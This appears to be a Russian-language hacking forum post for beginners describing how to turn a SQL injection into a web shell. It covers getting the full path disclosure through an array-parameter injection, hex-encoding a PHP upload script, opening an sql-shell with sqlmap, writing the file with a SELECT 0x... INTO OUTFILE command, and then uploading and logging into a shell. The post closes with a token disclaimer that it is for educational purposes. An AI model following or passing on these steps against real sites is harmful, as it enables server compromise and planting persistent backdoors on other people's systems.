Доброго времени суток, друзья.
Я давно натыкался на статейку, сейчас уже не могу её найти. Но думаю вам будет интересно почитать.
Сразу говорю, статья не для пропентестеров, а для тех кто только начинает свой путь в этой сфере. Не судите строго...
Для начала нам понадобится:
1) PHPSHell
2) SQLmap
3)
Скрипт на пхыеСкрипт аплоада на Пых'е
=============================
Первым делом, после того как мы нашли уязвимость, нам надо получить FPD. Варинтов множество, но мне обычно подходит Array[] Parameter инъекция.
И получаем ожидаемое.
Сообщение от
None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
Далее нам нужно перевезти код "нашего" скрипта для аплоада в hex. На выхлопе мы получаем незатейливый кодец и стремительно запускаем скульмап. Для получения максимальной информации я стараюсь убить двух зайцев сразу, чего и вам советую. Помимо того, что мы хотим попасть в шелл SQL было бы славно познакомиться с базой.
Перед нашими глазами воспрянет:
Сообщение от
None
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
Наша команда должна иметь вид:
Код:
SELECT 0xНаш_хекс_код INTO OUTFILE "Полный/путь/и_имя/файла.php";
Допустим мы назвали его upload.php, значит дико-бешено бежим на
http://www.example.com/upload.php. Заливаем шелл и занимаемся его поиском. После чего можно логиниться на него и продолжать идти к намеченной цели.
===========
Работает это только на MySQL и только с file-priv "Y"
Статья написана в ознакомительных целях, только для расширения кругозора новичков. Автор не несёт ответственности на её использование.